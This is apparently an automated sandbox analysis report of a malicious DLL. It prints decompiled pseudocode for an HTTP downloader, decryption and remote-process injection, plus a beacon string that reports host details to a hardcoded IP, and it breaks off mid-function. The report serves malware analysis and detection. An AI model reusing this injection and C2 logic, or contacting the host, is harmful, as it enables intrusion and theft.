ResumeThread 8659->8660 8660->8658 8669 343ac0 8661->8669 8663 343b7a 8664 343bc6 8663->8664 8665 343b97 wsprintfA 8663->8665 8668 343bbf 8663->8668 8667 3436c0 3 API calls 8664->8667 8674 3436c0 8665->8674 8667->8668 8668->8587 8670 343b1e 8669->8670 8671 343aca 8669->8671 8670->8663 8671->8670 8672 343ad0 CreateFileA 8671->8672 8672->8670 8673 343af5 WriteFile CloseHandle 8672->8673 8673->8670 8675 3414a0 8674->8675 8676 3436da CreateProcessA 8675->8676 8677 343705 CloseHandle CloseHandle 8676->8677 8678 343701 8676->8678 8677->8678 8678->8668 8680 343890 8679->8680 8681 34391d VirtualAlloc 8679->8681 8683 342c40 3 API calls 8680->8683 8682 343939 8681->8682 8686 3438a4 8681->8686 8682->8686 8687 343953 CreateThread 8682->8687 8684 34389d 8683->8684 8685 3438ab VirtualAllocEx 8684->8685 8684->8686 8685->8686 8688 3438cb WriteProcessMemory 8685->8688 8686->8596 8687->8686 8689 343973 CloseHandle 8687->8689 8692 3439e0 8687->8692 8688->8686 8690 3438e7 CreateRemoteThread 8688->8690 8689->8686 8690->8686 8691 34390a CloseHandle 8690->8691 8691->8686 8693 3439ed 8692->8693 8695 34373f 8694->8695 8701 343746 8695->8701 8703 343180 8695->8703 8700 34377c CreateThread 8700->8701 8702 34379c CloseHandle 8700->8702 8717 3439a0 8700->8717 8701->8605 8702->8701 8704 3431b2 VirtualAlloc 8703->8704 8705 3431d0 VirtualAlloc 8704->8705 8709 3431ec 8704->8709 8705->8709 8706 3431f2 8707 343263 8706->8707 8708 343252 VirtualFree 8706->8708 8707->8701 8710 343580 8707->8710 8708->8707 8709->8704 8709->8706 8716 3435bb 8710->8716 8711 343601 8711->8700 8711->8701 8712 3435c8 GetModuleHandleA 8713 3435ee LoadLibraryA 8712->8713 8712->8716 8713->8716 8714 343653 GetProcAddress 8714->8716 8715 34366e GetProcAddress 8715->8716 8716->8711 8716->8712 8716->8714 8716->8715 8718 3439cf 8717->8718 8720 341750 8719->8720 8721 341773 8719->8721 8720->8424 8721->8720 8722 3413d0 HeapFree 8721->8722 8722->8720 8724 3419a0 8723->8724 8725 341990 8723->8725 8724->8424 8726 3413d0 HeapFree 8725->8726 8726->8724

                                                  Executed Functions

                                                  Function 00341FE0, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 183networkCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 89%
                                                  			E00341FE0(char* _a4, void* _a8, long _a12, DWORD** _a16) {
				void* _v8;
				long _v12;
				void* _v16;
				signed short _v20;
				signed int _v24;
				void _v28;
				void _v32;
				void* _v36;
				long _v40;
				long _v44;
				int _v48;
				intOrPtr _v60;
				char* _v64;
				signed short _v84;
				intOrPtr _v88;
				char* _v92;
				long _v96;
				void* _v108;
				char _v368;
				char _v628;
				int _t79;
				void* _t80;
				void* _t83;
				int _t97;
				void* _t141;

				E003414A0( &_v108, 0, 0x3c);
				_v108 = 0x3c;
				_v92 =  &_v368;
				_v88 = 0x104;
				_v64 =  &_v628;
				_v60 = 0x104;
				 *((char*)(_t141 + 0xfffffffffffffe94)) = 0;
				 *((char*)(_t141 + 0xfffffffffffffd90)) = 0;
				_t79 = InternetCrackUrlA(_a4, 0, 0,  &_v108); // executed
				if(_t79 != 0) {
					if(_v96 == 0) {
						_v96 = 3;
					}
					if(_v96 == 3 || _v96 == 4) {
						_t80 = E003424F0(); // executed
						_v36 = _t80;
						if(_v36 != 0) {
							_v20 = _v84;
							_v24 = 0x84080100;
							if(_v96 == 4) {
								_v24 = _v24 | 0x00803000;
							}
							_t83 = InternetConnectA(_v36,  &_v368, _v20 & 0x0000ffff, 0, 0, 3, 0, 1); // executed
							_v16 = _t83;
							if(_v16 != 0) {
								_v8 = HttpOpenRequestA(_v16, "GET",  &_v628, 0, 0, 0x347050, _v24, 1);
								if(_v8 != 0) {
									if(_v96 == 4) {
										_v40 = 4;
										InternetQueryOptionA(_v8, 0x1f,  &_v28,  &_v40);
										_v28 = _v28 | 0x00001100;
										InternetSetOptionA(_v8, 0x1f,  &_v28, 4);
									}
									HttpSendRequestA(_v8, 0, 0, 0, 0); // executed
									_v32 = 0;
									_v44 = 4;
									HttpQueryInfoA(_v8, 0x20000013,  &_v32,  &_v44, 0);
									if(_v32 != 0xc8 || _a8 == 0) {
										L26:
										InternetCloseHandle(_v8); // executed
										InternetCloseHandle(_v16);
										if(_v32 != 0xc8) {
											return 0;
										}
										return 1;
									} else {
										 *_a16 = 0;
										while(1 != 0) {
											_t97 = InternetReadFile(_v8, _a8, _a12,  &_v12); // executed
											_v48 = _t97;
											if(_v48 != 1 || _v12 <= 0) {
												goto L26;
											} else {
												_a8 = _a8 + _v12;
												_a12 = _a12 - _v12;
												 *_a16 =  *_a16 + _v12;
												continue;
											}
										}
										goto L26;
									}
								}
								InternetCloseHandle(_v16);
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						return 0;
					}
				}
				return 0;
			}




























                                                  0x00341ff1
                                                  0x00341ff9
                                                  0x00342006
                                                  0x00342009
                                                  0x00342016
                                                  0x00342019
                                                  0x00342028
                                                  0x00342038
                                                  0x0034204c
                                                  0x00342054
                                                  0x00342061
                                                  0x00342063
                                                  0x00342063
                                                  0x0034206e
                                                  0x0034207d
                                                  0x00342082
                                                  0x00342089
                                                  0x00342096
                                                  0x0034209a
                                                  0x003420a5
                                                  0x003420b0
                                                  0x003420b0
                                                  0x003420cd
                                                  0x003420d3
                                                  0x003420da
                                                  0x00342108
                                                  0x0034210f
                                                  0x00342126
                                                  0x00342128
                                                  0x0034213d
                                                  0x0034214b
                                                  0x0034215a
                                                  0x0034215a
                                                  0x0034216c
                                                  0x00342172
                                                  0x00342179
                                                  0x00342193
                                                  0x003421a0
                                                  0x00342204
                                                  0x00342208
                                                  0x00342212
                                                  0x0034221f
                                                  0x00000000
                                                  0x00342228
                                                  0x00000000
                                                  0x003421a8
                                                  0x003421ab
                                                  0x003421b1
                                                  0x003421ca
                                                  0x003421d0
                                                  0x003421d7
                                                  0x00000000
                                                  0x003421df
                                                  0x003421e5
                                                  0x003421ee
                                                  0x003421fc
                                                  0x00000000
                                                  0x00342202
                                                  0x003421d7
                                                  0x00000000
                                                  0x003421b1
                                                  0x003421a0
                                                  0x00342115
                                                  0x00000000
                                                  0x003420dc
                                                  0x00000000
                                                  0x003420dc
                                                  0x003420da
                                                  0x00000000
                                                  0x00342076
                                                  0x00000000
                                                  0x00342076
                                                  0x0034206e
                                                  0x00000000

                                                  APIs
                                                  • InternetCrackUrlA.WININET(00341AD9,00000000,00000000,0000003C), ref: 0034204C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CrackInternet
                                                  • String ID: <$GET$b%4
                                                  • API String ID: 1381609488-3990811026
                                                  • Opcode ID: 3f16654737ec8329ee9c171fbc9684e0ef6940ee9561aff2280cbf235cdc0108
                                                  • Instruction ID: 858210e9bf5f2fd06378b79b77eb74743c289ea269def6f0c81301cfc60e9672
                                                  • Opcode Fuzzy Hash: 3f16654737ec8329ee9c171fbc9684e0ef6940ee9561aff2280cbf235cdc0108
                                                  • Instruction Fuzzy Hash: 3C71FB74D00209EBEB15CF94D849BEFB7B8AB48704F508469F611BB280D7B5AA44CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0036EAD1, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 68 36ead1-36eb1d 70 36eb27-36eb2d 68->70 71 36eb1f-36eb25 68->71 73 36eb32-36eb37 70->73 72 36eb46-36eb6e 71->72 76 36ebb2-36ec78 VirtualAlloc call 36e828 call 36e7f8 VirtualAlloc call 36e780 VirtualFree 72->76 77 36eb70-36eb72 72->77 74 36eb40 73->74 75 36eb39-36eb3e 73->75 74->72 75->73 85 36ec95-36eca1 76->85 86 36ec7a-36ec94 call 36e828 76->86 77->76 78 36eb74-36ebae VirtualAlloc 77->78 78->76 88 36eca3-36eca6 85->88 89 36eca8 85->89 86->85 91 36ecab-36ecc6 call 36e7f8 88->91 89->91 94 36ece0-36ed0f 91->94 95 36ecc8-36ecdb call 36e6d7 91->95 97 36ed25-36ed30 94->97 98 36ed11-36ed1f 94->98 95->94 99 36ed32-36ed3b 97->99 100 36ed4b-36ed68 VirtualProtect 97->100 98->97 101 36ed21 98->101 99->100 102 36ed3d-36ed45 99->102 103 36ed9d-36ee54 call 36e95a call 36e8ec call 36e990 VirtualProtect 100->103 104 36ed6a-36ed76 100->104 101->97 102->100 105 36ed47 102->105 115 36ee5a-36ee7f 103->115 106 36ed78-36ed8f VirtualProtect 104->106 105->100 108 36ed93-36ed9b 106->108 109 36ed91 106->109 108->103 108->106 109->108 116 36ee81-36ee86 115->116 117 36ee88 115->117 118 36ee8d-36ee98 116->118 117->118 119 36ee9d-36eeb5 VirtualProtect 118->119 120 36ee9a 118->120 119->115 121 36eeb7-36eede VirtualFree GetPEB 119->121 120->119 122 36eee3-36eeea 121->122 123 36eef0-36ef0a 122->123 124 36eeec 122->124 126 36ef0d-36ef36 call 36ea00 call 36ef3b 123->126 124->122 125 36eeee 124->125 125->126
                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,00000747,00003000,00000040,00000747,0036E520), ref: 0036EB8E
                                                  • VirtualAlloc.KERNEL32(00000000,00000056,00003000,00000040,0036E583), ref: 0036EBC5
                                                  • VirtualAlloc.KERNEL32(00000000,00008440,00003000,00000040), ref: 0036EC25
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0036EC5B
                                                  • VirtualProtect.KERNEL32(00340000,00000000,00000004,0036EAB0), ref: 0036ED60
                                                  • VirtualProtect.KERNEL32(00340000,00001000,00000004,0036EAB0), ref: 0036ED87
                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,0036EAB0), ref: 0036EE54
                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,0036EAB0,?), ref: 0036EEAA
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0036EEC6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348607784.000000000036E000.00000040.00020000.sdmp, Offset: 0036E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36e000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Protect$Alloc$Free
                                                  • String ID:
                                                  • API String ID: 2574235972-0
                                                  • Opcode ID: b8860180137a99a01dd5583635bfa050268266bf5e99bcb38fbceefd7ff4e24e
                                                  • Instruction ID: fe9c6763fb14d4ce60d0bc32a70d4ed0e82d91f9040b0920a7b072d327cffc37
                                                  • Opcode Fuzzy Hash: b8860180137a99a01dd5583635bfa050268266bf5e99bcb38fbceefd7ff4e24e
                                                  • Instruction Fuzzy Hash: 31D16936580680DFEB12CF04CC81F5177AAFF49310B1941A4EE0BAF65AD770A858DBE6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00342CD0, Relevance: 12.1, APIs: 8, Instructions: 91encryptionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 146 342cd0-342d10 CryptAcquireContextA 147 342d12 146->147 148 342d1c-342d35 CryptCreateHash 146->148 149 342da0-342da4 147->149 150 342d37 148->150 151 342d3b-342d51 CryptHashData 148->151 154 342da6-342db0 CryptDestroyHash 149->154 155 342db7-342dbb 149->155 150->149 152 342d57-342d74 CryptDeriveKey 151->152 153 342d53 151->153 156 342d76 152->156 157 342d7a-342d94 CryptDecrypt 152->157 153->149 154->155 158 342dbd-342dc7 CryptDestroyKey 155->158 159 342dce-342dd2 155->159 156->149 160 342d96 157->160 161 342d9a-342d9d 157->161 158->159 162 342dd4-342de0 CryptReleaseContext 159->162 163 342de7-342ded 159->163 160->149 161->149 162->163
                                                  C-Code - Quality: 37%
                                                  			E00342CD0(BYTE* _a4, int _a8, intOrPtr _a12, intOrPtr _a16) {
				int _v8;
				long* _v12;
				long* _v16;
				int _v20;
				intOrPtr _v24;
				int _t32;
				intOrPtr _t33;
				long* _t35;

				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v24 = 0x280011;
				_t32 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
				if(_t32 != 0) {
					__imp__CryptCreateHash(_v12, 0x8004, 0, 0,  &_v8);
					if(_t32 != 0) {
						_t33 = _a16;
						__imp__CryptHashData(_v8, _a12, _t33, 0);
						if(_t33 != 0) {
							_t35 = _v12;
							__imp__CryptDeriveKey(_t35, 0x6801, _v8, _v24,  &_v16);
							if(_t35 != 0) {
								if(CryptDecrypt(_v16, 0, 1, 0, _a4,  &_a8) != 0) {
									_v20 = _a8;
								}
							}
						}
					}
				}
				if(_v8 != 0) {
					__imp__CryptDestroyHash(_v8);
					_v8 = 0;
				}
				if(_v16 != 0) {
					CryptDestroyKey(_v16);
					_v16 = 0;
				}
				if(_v12 != 0) {
					CryptReleaseContext(_v12, 0);
					_v12 = 0;
				}
				return _v20;
			}











                                                  0x00342cd6
                                                  0x00342cdd
                                                  0x00342ce4
                                                  0x00342ceb
                                                  0x00342cf2
                                                  0x00342d08
                                                  0x00342d10
                                                  0x00342d2d
                                                  0x00342d35
                                                  0x00342d3d
                                                  0x00342d49
                                                  0x00342d51
                                                  0x00342d68
                                                  0x00342d6c
                                                  0x00342d74
                                                  0x00342d94
                                                  0x00342d9d
                                                  0x00342d9d
                                                  0x00342d94
                                                  0x00342d74
                                                  0x00342d51
                                                  0x00342d35
                                                  0x00342da4
                                                  0x00342daa
                                                  0x00342db0
                                                  0x00342db0
                                                  0x00342dbb
                                                  0x00342dc1
                                                  0x00342dc7
                                                  0x00342dc7
                                                  0x00342dd2
                                                  0x00342dda
                                                  0x00342de0
                                                  0x00342de0
                                                  0x00342ded

                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 00342D08
                                                  • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 00342D2D
                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00342DAA
                                                  • CryptDestroyKey.ADVAPI32(00000000), ref: 00342DC1
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00342DDA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$ContextDestroyHash$AcquireCreateRelease
                                                  • String ID:
                                                  • API String ID: 1222261195-0
                                                  • Opcode ID: 2715d1e805116782b2e2b0a8f1876e14d5461af7cb73b9ee0d84011dd38788ad
                                                  • Instruction ID: 9758c764814f041e1c376b0fb8701045b6d50443913e917bc034a41f78d8973c
                                                  • Opcode Fuzzy Hash: 2715d1e805116782b2e2b0a8f1876e14d5461af7cb73b9ee0d84011dd38788ad
                                                  • Instruction Fuzzy Hash: 98312E79E00208FBEB15CFA4DC49FAFB7B8AB45705F508058F611BB280D7B5AA44DB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00343400, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 170 343400-343428 call 3414a0 GetModuleHandleA 173 34342e-343444 GetProcAddress 170->173 174 34342a-34342c 170->174 176 343446-34344d GetNativeSystemInfo 173->176 177 34344f-343453 GetSystemInfo 173->177 175 34346b-34346e 174->175 178 343459-343460 176->178 177->178 179 343462-343467 178->179 180 343469 178->180 179->175 180->175
                                                  C-Code - Quality: 75%
                                                  			E00343400() {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _v12;
				struct _SYSTEM_INFO _v48;

				E003414A0( &_v48, 0, 0x24);
				_v8 = GetModuleHandleA("kernel32.dll");
				if(_v8 != 0) {
					_v12 = GetProcAddress(_v8, "GetNativeSystemInfo");
					if(_v12 == 0) {
						GetSystemInfo( &_v48);
					} else {
						_v12( &_v48);
					}
					if((_v48.dwOemId & 0x0000ffff) != 9) {
						return 0;
					} else {
						return 1;
					}
				}
				return 0;
			}






                                                  0x0034340e
                                                  0x00343421
                                                  0x00343428
                                                  0x0034343d
                                                  0x00343444
                                                  0x00343453
                                                  0x00343446
                                                  0x0034344a
                                                  0x0034344a
                                                  0x00343460
                                                  0x00000000
                                                  0x00343462
                                                  0x00000000
                                                  0x00343462
                                                  0x00343460
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,00341B21), ref: 0034341B
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00343437
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 0034344A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleInfoModuleNativeProcSystem
                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                  • API String ID: 3469989633-192647395
                                                  • Opcode ID: 27a495caee833a46c6e130f6c3777f5d2f70963e35cacb308ca3274ab44b0334
                                                  • Instruction ID: c5a16b9ad821bc9b9dcd82342777376585b6a8c9f778832950ba0a6e769d6195
                                                  • Opcode Fuzzy Hash: 27a495caee833a46c6e130f6c3777f5d2f70963e35cacb308ca3274ab44b0334
                                                  • Instruction Fuzzy Hash: C7018134D00208EBCB06DFF698497EDB7F8EB08711F108565E601BB280E778A794D760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00341AA0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 138COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 189 341aa0-341b28 call 341420 GetVersion call 342630 call 3430f0 call 342520 call 3423c0 call 343400 202 341b69-341ba3 call 3425b0 wsprintfA 189->202 203 341b2a-341b44 call 3425b0 189->203 208 341ba6-341bad 202->208 206 341b49-341b67 wsprintfA 203->206 206->208 209 341bd2 208->209 210 341baf-341bce call 341390 208->210 212 341bd9-341bdd 209->212 210->209 214 341be3-341bf6 212->214 215 341c68 212->215 217 341bf8-341c07 call 342660 214->217 218 341c0a-341c24 call 3428d0 214->218 216 341c6a-341c6d 215->216 217->218 222 341c29-341c33 218->222 223 341c44-341c48 222->223 224 341c35-341c41 call 341a00 222->224 226 341c51-341c63 223->226 227 341c4a-341c4f 223->227 224->223 226->212 227->216
                                                  C-Code - Quality: 95%
                                                  			E00341AA0(intOrPtr __edx, void* __eflags, void* _a4, intOrPtr _a8, DWORD* _a12) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v68;
				char _v324;
				char _v2372;
				char _v6468;
				intOrPtr _t47;
				intOrPtr _t56;
				char* _t63;
				intOrPtr _t66;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				char* _t72;
				void* _t75;
				char* _t89;
				intOrPtr _t95;
				char* _t104;
				intOrPtr _t106;
				void* _t110;
				void* _t113;
				void* _t114;

				_t95 = __edx;
				E00341420(0x1940);
				_v12 = GetVersion();
				_t47 = E00342630(_t95); // executed
				_v32 = _t47;
				_v28 = _t95;
				E003430F0( &_v324); // executed
				E00342520( &_v68,  &_v68); // executed
				E003423C0( &_v2372); // executed
				_t113 = _t110 + 0xc;
				_v20 = _v12 & 0xff;
				_v16 = (_v12 & 0xffff) >> 0x00000008 & 0xff;
				_t56 = E00343400(); // executed
				_v36 = _t56;
				if(_v36 != 1) {
					_push(_v16);
					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)", _v32, _v28, E003425B0( &_v68),  &_v324,  &_v2372,  &_v68, _v20);
					_t114 = _t113 + 0x28;
				} else {
					_push(_v16);
					_t75 = E003425B0( &_v324); // executed
					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)", _v32, _v28, _t75,  &_v324,  &_v2372,  &_v68, _v20);
					_t114 = _t113 + 0x28;
				}
				if( *0x3472a0 == 0) {
					_t71 = E00341390(0x400);
					_t114 = _t114 + 4;
					 *0x3472a0 = _t71;
					_t72 =  *0x3472a0; // 0x55c170
					 *_t72 = 0;
				}
				_v24 = 1;
				while(_v24 == 1) {
					_t63 =  *0x3472a0; // 0x55c170
					_t87 =  *_t63;
					if( *_t63 == 0) {
						_t106 =  *0x3472a0; // 0x55c170
						_t70 = E00342660(_t87, _t106);
						_t114 = _t114 + 4;
						_v24 = _t70;
					}
					_t89 =  *0x3472a0; // 0x55c170
					_t66 = E003428D0(_t89,  &_v6468, _a4, _a8, _a12); // executed
					_t114 = _t114 + 0x14;
					_v8 = _t66;
					if(_v8 == 1) {
						_t69 = E00341A00(_t89, _a4);
						_t114 = _t114 + 4;
						_v8 = _t69;
					}
					if(_v8 != 1) {
						_t104 =  *0x3472a0; // 0x55c170
						 *_t104 = 0;
						continue;
					} else {
						return 1;
					}
				}
				return 0;
			}































                                                  0x00341aa0
                                                  0x00341aa8
                                                  0x00341ab3
                                                  0x00341ab6
                                                  0x00341abb
                                                  0x00341abe
                                                  0x00341ac8
                                                  0x00341ad4
                                                  0x00341ae3
                                                  0x00341ae8
                                                  0x00341aff
                                                  0x00341b19
                                                  0x00341b1c
                                                  0x00341b21
                                                  0x00341b28
                                                  0x00341b6c
                                                  0x00341b9d
                                                  0x00341ba3
                                                  0x00341b2a
                                                  0x00341b2d
                                                  0x00341b44
                                                  0x00341b5e
                                                  0x00341b64
                                                  0x00341b64
                                                  0x00341bad
                                                  0x00341bb4
                                                  0x00341bb9
                                                  0x00341bbc
                                                  0x00341bc9
                                                  0x00341bce
                                                  0x00341bce
                                                  0x00341bd2
                                                  0x00341bd9
                                                  0x00341beb
                                                  0x00341bf0
                                                  0x00341bf6
                                                  0x00341bf8
                                                  0x00341bff
                                                  0x00341c04
                                                  0x00341c07
                                                  0x00341c07
                                                  0x00341c1d
                                                  0x00341c24
                                                  0x00341c29
                                                  0x00341c2c
                                                  0x00341c33
                                                  0x00341c39
                                                  0x00341c3e
                                                  0x00341c41
                                                  0x00341c41
                                                  0x00341c48
                                                  0x00341c59
                                                  0x00341c5f
                                                  0x00000000
                                                  0x00341c4a
                                                  0x00000000
                                                  0x00341c4a
                                                  0x00341c48
                                                  0x00000000

                                                  APIs
                                                  • GetVersion.KERNEL32(?,003418CD,?,00100000,?), ref: 00341AAD
                                                    • Part of subcall function 003430F0: GetComputerNameA.KERNEL32(?,00000104), ref: 0034311A
                                                    • Part of subcall function 003430F0: lstrcatA.KERNEL32(00100000,?), ref: 0034312F
                                                    • Part of subcall function 003430F0: lstrcatA.KERNEL32(00100000, @ ), ref: 0034313E
                                                    • Part of subcall function 003430F0: lstrcatA.KERNEL32(00100000,?), ref: 00343162
                                                    • Part of subcall function 00342520: lstrcpyA.KERNEL32(00341AD9,84.17.52.8,?,?,00341AD9,?,?), ref: 00342540
                                                    • Part of subcall function 003423C0: DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,00341AE8,?,?,00341AE8,?,?,?), ref: 003423E1
                                                    • Part of subcall function 00343400: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,00341B21), ref: 0034341B
                                                  • wsprintfA.USER32 ref: 00341B5E
                                                  • wsprintfA.USER32 ref: 00341B9D
                                                  Strings
                                                  • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32), xrefs: 00341B91
                                                  • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64), xrefs: 00341B52
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$wsprintf$ComputerDomainEnumerateHandleModuleNameTrustsVersionlstrcpy
                                                  • String ID: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)$GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)
                                                  • API String ID: 768865819-2171647522
                                                  • Opcode ID: b89b1dc0f49e362b062368d8d4336e97ef04c9efc8478a0b3d0af7cc3d8cbabd
                                                  • Instruction ID: e228579921a923e20b3c2eae77035d1985fb8b362c3e3545dc034b6b895a1377
                                                  • Opcode Fuzzy Hash: b89b1dc0f49e362b062368d8d4336e97ef04c9efc8478a0b3d0af7cc3d8cbabd
                                                  • Instruction Fuzzy Hash: 2D513DB6D002199BDB16DF94DC91AFEB7F8FB48300F048569F206AF241E734AA85CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00343270, Relevance: 6.1, APIs: 4, Instructions: 113memoryinjectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 258 343270-3432a2 259 3432a9-3432c9 VirtualAllocEx 258->259 260 3432eb-3432ef 259->260 261 3432cb-3432e8 VirtualAllocEx 259->261 262 3432f6-343309 call 341390 260->262 263 3432f1 260->263 261->260 270 34330d-343327 call 343a00 262->270 271 34330b 262->271 264 34337c-343380 263->264 266 343382-34338b call 3413d0 264->266 267 34338e-343392 264->267 266->267 272 343394-343398 267->272 273 3433af-3433b5 267->273 278 34334d 270->278 279 343329-34332d 270->279 271->264 272->273 276 34339a-3433a9 VirtualFreeEx 272->276 276->273 278->264 280 343337-34333b 279->280 281 34332f-343335 279->281 282 34333d-343349 280->282 283 34334b-343369 WriteProcessMemory 280->283 281->280 282->283 285 34336d-343376 283->285 286 34336b 283->286 285->259 285->264 286->264
                                                  C-Code - Quality: 88%
                                                  			E00343270(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				void* _t55;
				void* _t57;
				void* _t59;
				int _t65;
				void* _t92;
				void* _t93;

				_t3 = _a8 + 0x3c; // 0xf445c7f8
				_v24 = _a8 +  *_t3;
				_v16 =  *((intOrPtr*)(_v24 + 0x34));
				_v20 =  *((intOrPtr*)(_v24 + 0x50));
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				while(1) {
					_t55 = VirtualAllocEx(_a4, _v16, _v20, 0x3000, 0x40); // executed
					_v8 = _t55;
					if(_v8 == 0) {
						_v8 = VirtualAllocEx(_a4, 0, _v20, 0x3000, 0x40);
						_v16 = _v8;
					}
					if(_v8 == 0) {
						break;
					}
					_t57 = E00341390(_v20); // executed
					_t93 = _t92 + 4;
					_v12 = _t57;
					if(_v12 != 0) {
						_t59 = E00343A00(_a8, _a12, _v12, _v16);
						_t92 = _t93 + 0x10;
						if(_t59 == 0) {
						} else {
							if(_a16 != 0) {
								 *_a16 = _v16;
							}
							if(_a20 != 0) {
								 *_a20 = _v16 +  *((intOrPtr*)(_v24 + 0x28));
							}
